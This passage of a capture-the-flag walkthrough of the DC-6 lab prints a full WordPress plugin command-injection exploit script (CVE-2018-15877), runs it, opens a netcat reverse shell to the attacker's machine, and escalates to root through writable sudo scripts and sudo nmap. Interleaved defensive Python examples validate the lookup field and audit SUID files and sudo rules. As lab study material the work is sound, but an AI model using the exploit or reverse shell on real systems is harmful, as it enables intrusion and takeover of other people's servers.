Papers: No Results
Four usable exploit scripts were found.
┌──(root㉿kali)-[/home/kali]
└─# searchsploit -x php/webapps/50110.py
Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
URL: https://www.exploit-db.com/exploits/50110
Path: /usr/share/exploitdb/exploits/php/webapps/50110.py
Codes: CVE-2018-15877
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
3.4.4 Inspect the poc file
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cp /usr/share/exploitdb/exploits/php/webapps/50110.py poc.py
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat poc.py
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877
"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28 whoami
www-data
www-data@192.168.101.28 pwd
/var/www/html/wp-admin
www-data@192.168.101.28 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""
import requests
from bs4 import BeautifulSoup

def exploit(whoami, ip):
    while 1:
        cmd = input(whoami+"@"+ip+" ")
        url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
        payload = "google.com.tr | " + cmd
        data = {'ip': payload , 'lookup' : 'lookup' }
        x = requests.post(url, data = data, cookies=getCookie(ip))
        html_doc = x.text.split("<p>Output from dig: </p>")[1]
        soup = BeautifulSoup(html_doc, 'html.parser')
        print(soup.p.text)

def poc(ip):
    url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
    myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
    x = requests.post(url, data = myobj, cookies=getCookie(ip))
    html_doc = x.text.split("<p>Output from dig: </p>")[1]
    soup = BeautifulSoup(html_doc, 'html.parser')
    print("[*] Perfect! ")
    exploit(soup.p.text, ip)

def getCookie(ip):
    url = 'http://' + ip + '/wp-login.php'
    #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
    data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
    x = requests.post(url, data = data)
    cookies = {}
    cookie = str(x.headers["Set-Cookie"])
    for i in cookie.split():
        if(i.find("wordpress") != -1 and i.find("=") != -1):
            cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
    return cookies

ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
The poc file already documents how to use it.
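As an added defensive example (not the plugin's code and not from the original post): the poc above works because the lookup tool's `ip` field reaches dig through a shell, so "google.com.tr | whoami" becomes a second command. The hardened handler below accepts only an IP literal or a hostname and hands it to dig as a single argv element with no shell in between; the function names, the sample inputs and the dry-run flag are assumptions made for this example.

```python
"""Hardened lookup handler for an "IP / hostname lookup" tool of the kind the
Plainview Activity Monitor exposes.  Added example, not the plugin's code;
function names, sample inputs and the dry-run flag are assumptions."""
import ipaddress
import re
import shlex
import subprocess

# One RFC 1123 label: starts and ends with a letter or digit, hyphens inside,
# at most 63 characters.  A whole name is labels joined by dots.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def validate_lookup_target(value):
    """Return the cleaned value if it is an IP literal or a hostname,
    otherwise raise ValueError.

    This is an allow-list: instead of hunting for '|', ';', '&&' or '$('
    (a blacklist that the poc's payload style is built to slip past),
    only the characters a DNS lookup legitimately needs are accepted.
    Shell metacharacters, spaces and a leading '-' (which dig would read
    as an option) cannot pass.
    """
    value = value.strip()
    if not value or len(value) > 253:
        raise ValueError("empty or overlong lookup target")
    try:
        ipaddress.ip_address(value)      # IPv4 or IPv6 literal
        return value
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError("rejected lookup target: %r" % value)


def build_dig_argv(value):
    """argv for dig.  The target is one list element, so even a value that
    somehow contained a space or a pipe would reach dig as a literal
    argument, never as shell syntax."""
    return ["dig", "+short", validate_lookup_target(value)]


def run_lookup(value, dry_run=True):
    """Run the lookup without a shell.  dry_run=True returns the command
    line that would run (used below so the example needs no network and
    no dig binary); dry_run=False actually executes it."""
    argv = build_dig_argv(value)
    if dry_run:
        return shlex.join(argv)
    done = subprocess.run(argv, capture_output=True, text=True,
                          timeout=10, check=False)
    return done.stdout


def is_safe_target(value):
    """True if validate_lookup_target would accept the value."""
    try:
        validate_lookup_target(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the poc's injection payload beside legitimate ones.
    for sample in ("google.fr", "192.168.6.157", "google.com.tr | whoami",
                   "wordy;id", "$(id).example.com", "-x"):
        print("%-28s accepted=%s" % (sample, is_safe_target(sample)))
    print(run_lookup("wordy"))
```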
3.4.5 Run the poc file
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# python poc.py
What's your target IP?
192.168.6.157
What's your username?
mark
What's your password?
helpdesk01
[*] Please wait...
[*] Perfect!
www-data@192.168.6.157
3.4.6 Reverse shell
3.4.6.1 Listen on port 6666 in Kali
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
3.4.6.2 Reverse shell
In the terminal running poc.py:
www-data@192.168.6.157 nc -e /bin/sh 192.168.6.66 6666
3.4.6.3 Spawn a proper terminal
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [192.168.6.66] from wordy [192.168.6.157] 56862
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-6:/var/www/html/wp-admin$
A proper terminal is obtained.
3.4.7 Trying SUID privilege escalation
Look for files with the SUID bit (4000) set, suppressing error output:
www-data@dc-6:/var/www/html/wp-admin$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$
Nothing useful.
3.4.8 More system information
The graham account's credentials are found in a file under /home/mark/stuff.
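The SUID list above is exactly what a defender should record as a baseline, because a root-owned setuid file that is not on it is the usual trace of a planted backdoor or a careless install. This is an added example, not part of the original post: a Python equivalent of `find / -perm -4000 -type f 2>/dev/null` plus a baseline comparison, using the DC-6 list above as the constructed baseline. `find_suid`, `compare_to_baseline` and `scan_demo_tree` are names chosen here.

```python
import os
import stat
import tempfile
from typing import Iterable, List, Set, Tuple

# Constructed baseline: the SUID binaries recorded on DC-6 above. In practice
# the baseline is taken from a freshly built, known-good copy of the host.
DC6_SUID_BASELINE: Set[str] = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/chfn", "/usr/bin/sudo", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/chsh", "/usr/bin/passwd",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}

# Pseudo-filesystems that `find /` walks as well but which never hold binaries.
PRUNE_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root: str = "/") -> List[str]:
    """Equivalent of `find root -perm -4000 -type f 2>/dev/null`: every regular
    file under root with the setuid bit, not following symlinks and silently
    skipping directories we are not allowed to read."""
    hits: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: a symlink is never a SUID hit
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def compare_to_baseline(found: Iterable[str], baseline: Set[str]) -> Tuple[List[str], List[str]]:
    """Return (new, missing). `new` is what a planted or misconfigured SUID
    binary looks like and is the list to alert on; `missing` usually means a
    package was removed or hardened."""
    current = set(found)
    return sorted(current - baseline), sorted(baseline - current)


def scan_demo_tree() -> Tuple[str, List[str], bool]:
    """Build a throwaway tree with one setuid file and one plain file, scan it,
    and return (setuid_path, hits, bit_applied). bit_applied is False only if
    the filesystem refused to store the setuid bit."""
    with tempfile.TemporaryDirectory(prefix="suid-demo-") as tmp:
        plain = os.path.join(tmp, "plain")
        setuid = os.path.join(tmp, "setuid-bin")
        for p in (plain, setuid):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\ntrue\n")   # constructed placeholder content
        os.chmod(plain, 0o755)
        os.chmod(setuid, 0o4755)
        applied = bool(os.stat(setuid).st_mode & stat.S_ISUID)
        return setuid, find_suid(tmp), applied


if __name__ == "__main__":
    new, missing = compare_to_baseline(find_suid("/"), DC6_SUID_BASELINE)
    print("new SUID files:", new)
    print("no longer SUID:", missing)
```

Run it as root on a schedule and alert on a non-empty `new` list; the same comparison with `stat.S_ISGID` covers setgid binaries (`-perm -2000`).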
www-data@dc-6:/var/www/html/wp-admin$ cd /home
cd /home
www-data@dc-6:/home$ ls
ls
graham jens mark sarah
www-data@dc-6:/home$ cd mark
cd mark
www-data@dc-6:/home/mark$ ls
ls
stuff
www-data@dc-6:/home/mark$ cd stuff
cd stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat th*
cat th*
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
Credentials obtained:
No. | Username | Password |
---|---|---|
1 | graham | GSo7isUM1D4 |
3.5 The graham user
3.5.1 Switching to graham
www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
graham@dc-6:/home/mark/stuff$
Logged in as graham successfully.
3.5.2 Trying sudo privilege escalation again
graham@dc-6:/home/mark/stuff$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
/home/jens/backups.sh is found.
3.5.3 Appending bash to backups.sh
graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$
3.6 The jens user
3.6.1 Switching to jens
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
sudo -u jens ./backups.sh
tar: Removing leading `/' from member names
jens@dc-6:~$
Switched to jens successfully.
3.6.2 Checking SUID executables
jens@dc-6:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
jens@dc-6:~$
3.6.3 Checking commands runnable via sudo
sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
A sudo-runnable command is found: /usr/bin/nmap
3.7 Privilege escalation via nmap
3.7.1 Creating shell.nse
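Both sudo rules on this box fail in the same audit: graham may run `/home/jens/backups.sh` as jens, but the script is writable by graham (section 3.5.3 simply appends to it), and jens may run `/usr/bin/nmap` as root with NOPASSWD, a binary that executes whatever script file it is handed. The following is an added example, not from the original post: a Python audit that parses the two `sudo -l` outputs shown above (embedded as constructed copies) and flags a rule when its target is group- or world-writable, sits in a world-writable directory, needs no password, or is a script-capable binary allowed as root. `parse_sudo_l`, `audit_rule`, `demo_audit` and the `SCRIPT_CAPABLE` set are assumptions made here; the set contains only nmap, the binary used on this page, and is meant to be extended.

```python
import os
import re
import stat
import tempfile
from typing import Callable, Dict, List

# Constructed copies of the two `sudo -l` outputs shown on this page.
DC6_SUDO_L_GRAHAM = r"""Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""
DC6_SUDO_L_JENS = r"""Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
"""

# One rule line: "(runas) [TAG: ...] command [args]"
_SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Binaries that run caller-supplied script code (nmap executes Lua via --script,
# as shown below). Assumption: a minimal set, to be extended per environment.
SCRIPT_CAPABLE = {"/usr/bin/nmap"}


def parse_sudo_l(text: str) -> List[Dict[str, str]]:
    """Extract the rule lines that follow 'may run the following commands'."""
    rules: List[Dict[str, str]] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = _SUDO_RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group("runas").strip(),
                          "tags": m.group("tags").strip(),
                          "command": m.group("cmd").strip()})
    return rules


def audit_rule(rule: Dict[str, str], stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[str]:
    """Return human-readable findings for one sudo rule (empty list = nothing found)."""
    findings: List[str] = []
    path = rule["command"].split()[0]
    if "NOPASSWD" in rule["tags"]:
        findings.append("no password required")
    if rule["runas"] == "root" and path in SCRIPT_CAPABLE:
        findings.append(f"{path} runs caller-supplied scripts as root")
    try:
        st = stat_fn(path)
    except OSError:
        findings.append("target does not exist (whoever can create it controls the rule)")
        return findings
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("target is group- or world-writable")
    try:
        parent = stat_fn(os.path.dirname(path))
    except OSError:
        return findings
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable without the sticky bit")
    return findings


def demo_audit() -> Dict[str, List[str]]:
    """Recreate the DC-6 situation offline: a world-writable backups.sh run as
    another user, and nmap allowed as root. Returns findings keyed by basename."""
    with tempfile.TemporaryDirectory(prefix="sudo-audit-") as tmp:
        script = os.path.join(tmp, "backups.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n")  # constructed stand-in
        os.chmod(script, 0o777)   # writable by everyone, which is what let graham edit it
        rules = [
            {"runas": "jens", "tags": "NOPASSWD:", "command": script},
            {"runas": "root", "tags": "NOPASSWD:", "command": "/usr/bin/nmap"},
        ]
        return {os.path.basename(r["command"]): audit_rule(r) for r in rules}


if __name__ == "__main__":
    for text in (DC6_SUDO_L_GRAHAM, DC6_SUDO_L_JENS):
        for rule in parse_sudo_l(text):
            print(rule, "->", audit_rule(rule))
```

The remediation the audit points at is the usual one: sudo targets must be owned by root and writable only by root, and a rule that runs a script-capable binary as root is equivalent to granting a root shell, regardless of the NOPASSWD tag.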
jens@dc-6:~$ echo 'os.execute("/bin/bash")' > shell.nse
echo 'os.execute("/bin/bash")' > shell.nse
jens@dc-6:~$ ls
ls
backups.sh backups.tar.gz shell.nse
jens@dc-6:~$
3.7.2 Running shell.nse
jens@dc-6:~$ sudo -u root nmap --script=shell.nse
sudo -u root nmap --script=shell.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2024-05-29 22:52 AEST
root@dc-6:/home/jens#
After much effort, root is finally obtained, O(∩_∩)O haha~
3.7.3 Reading the flag
root@dc-6:/home/jens# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
root@dc-6:/home/jens# cat /root/theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Summary
In the DC-6 penetration test, tools such as nmap and whatweb were used: nmap for host discovery and port scanning, dirb for directory scanning, whatweb for web fingerprinting to collect key information, wpscan to brute-force the username and password, and finally Linux privilege escalation to obtain the flag. The approach was:
- Host discovery and port scanning with nmap
- Directory scanning with dirb
- Vulnerability search
- Obtain the PoC and run the PoC file
- Reverse shell
- Explore system information as three users (mark, graham, jens)
- Obtain root privileges via nmap
- Linux kernel privilege escalation, and obtain the flag
References
- The DC-6 environment
- Using arp-scan
- Detailed nmap usage tutorial
- Hacker tools: detailed whatweb usage tutorial
- Using xhydra
- Complete WPScan guide
- Guide to the web directory brute-forcing tool Dirb
- dirsearch tutorial
- dc-6 penetration test flowchart